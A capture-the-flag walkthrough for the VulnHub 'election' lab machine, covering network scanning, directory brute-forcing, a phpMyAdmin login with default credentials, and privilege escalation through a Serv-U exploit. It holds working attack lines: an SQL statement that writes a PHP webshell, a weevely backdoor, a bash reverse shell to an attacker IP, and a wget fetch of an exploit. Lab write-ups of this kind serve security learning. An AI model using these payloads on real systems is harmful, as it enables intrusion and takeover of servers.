vulnhub-wp election

🖳 host discover

sudo netdiscover -r 192.168.165.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                          
                                                                                                                                                                       
4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                                                                        
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.165.14  c6:3b:70:2b:33:1e      2     120  Unknown vendor                                                                                                       
192.168.165.196 20:1e:88:ad:fc:55      1      60  Intel Corporate                                                                                                      
192.168.165.209 08:00:27:40:48:1a      1      60  PCS Systemtechnik GmbH

target is 192.168.165.209

👁 service scan

nmap scan
sudo nmap -p- -sV -sC -Pn -oN nmap –min-rate 8000 192.168.165.209

···
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:40:48:1A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
···

🚪🚶 get shell

the apache was 2.4.49,but after trying payload,it seems dont have path traversa
and we find four path in robots.txt,finally election work,other was 404.
and we could brute the phpmyadmin path by dirb

dirb http://192.168.165.209
···
---- Scanning URL: http://192.168.165.209/ ----
+ http://192.168.165.209/index.html (CODE:200|SIZE:10918)                                                                                                               
==> DIRECTORY: http://192.168.165.209/javascript/                                                                                                                       
+ http://192.168.165.209/phpinfo.php (CODE:200|SIZE:95563)                                                                                                              
==> DIRECTORY: http://192.168.165.209/phpmyadmin/                                                                                                                       
+ http://192.168.165.209/robots.txt (CODE:200|SIZE:30)                                                                                                                  
+ http://192.168.165.209/server-status (CODE:403|SIZE:280)            
···

and we could login in it by root:toor

cause the secure_file_priv was empty,and we are root,so we could write webshell into the web

select "<?php system($_GET['cmd']);?>" into outfile "/var/www/html/shell.php"

and visit it in web

then download the weevely shell into the web.(generate by weevely)

weevely generate password back.php

• password was the pass when connect
  
  and connect it.
  
  this shell was not enough stable and powerful,use

bash -c ‘bash -i >& /dev/tcp/192.168.165.130/443 0>&1’
bound reverse shell

🛡️ PE

find suid binary file
find / -perm -u=s -type f 2>/dev/null

the Serv-U was exploit
searchsploit Serv-U

and get the exploit to the target machine(by wget).

rabbit hole

when i run script linpeas.sh, it show /var/spool/cron/ was important, and i found there was /crontabs/root file,and www-data was the owner,have the rw right,so i spend lots of time to try it.but it all fail, cause this directory’s cron must belong to this user,such as /crontabs/root must belong to user:root, and the directory have the drwx-wx–T right, so only root could delete or change the file, even the file’s owner! so the /crontabs/root was fail to excute. cause /crontabs/root‘s owner was www-data not root, and the www-data cant change the owner of /crontabs/root.

📖 recommend article

election download
another’s walkthrough